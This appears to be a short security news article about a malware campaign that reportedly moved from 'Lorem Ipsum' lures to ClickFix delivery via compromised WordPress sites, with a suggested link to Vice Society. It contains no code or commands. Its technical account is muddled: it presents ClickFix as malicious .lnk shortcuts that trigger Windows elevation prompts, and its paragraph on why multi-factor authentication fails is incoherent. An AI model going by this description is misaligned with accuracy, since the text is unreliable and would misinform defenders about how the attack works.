A malware campaign known for using “Lorem Ipsum” placeholder text lures has pivoted to ClickFix delivery through compromised WordPress websites, with security research published Tuesday suggesting the campaign may be linked to Vice Society, a ransom group previously known for large-scale data extortion campaigns.
The ClickFix variant uses compromised WordPress sites as hosting infrastructure, embedding malicious shortcut files (.lnk) in articles and download pages. When a victim double-clicks the file, Windows prompts for elevated execution under the guise of “enabling content,” and the victim unknowingly grants the malware system access through their own consent.
ClickFix Delivery: Bypassing User Security Habits Through Windows Prompts
The ClickFix delivery method exploits Windows shortcut files to trick users into running PowerShell commands that download and execute payloads silently. The technique works by using Windows’s own user interface prompts rather than asking the victim to take action on a suspicious file.
Users who have been trained to avoid suspicious email attachments no longer face this threat variant as a dangerous file because Windows itself is “asking” them to approve the execution. The user perceives the prompt as a legitimate system action rather than a social engineering attempt.
Traditional multi-factor authentication does not mitigate ClickFix if the execution appears authorized by the user’s own action, since the authentication factor is the initial access method while ClickFix operates entirely through user-authorized execution.
Vice Society Connection and WordPress Hosting Infrastructure
Research published Tuesday suggested a possible link between the ClickFix campaign and Vice Society, a ransom group previously known for large-scale data extortion campaigns. If confirmed, the ClickFix pivot extends Vice Society’s operational arsenal beyond traditional phishing to social engineering with higher effectiveness rates.
The use of compromised WordPress websites as hosting infrastructure means the malicious content is embedded in legitimate-looking articles and download pages, making the delivery mechanism blend in with normal web browsing traffic. The combination of ClickFix delivery and WordPress hosting creates a pipeline that is difficult to detect without endpoint-level analysis of shortcut file execution.
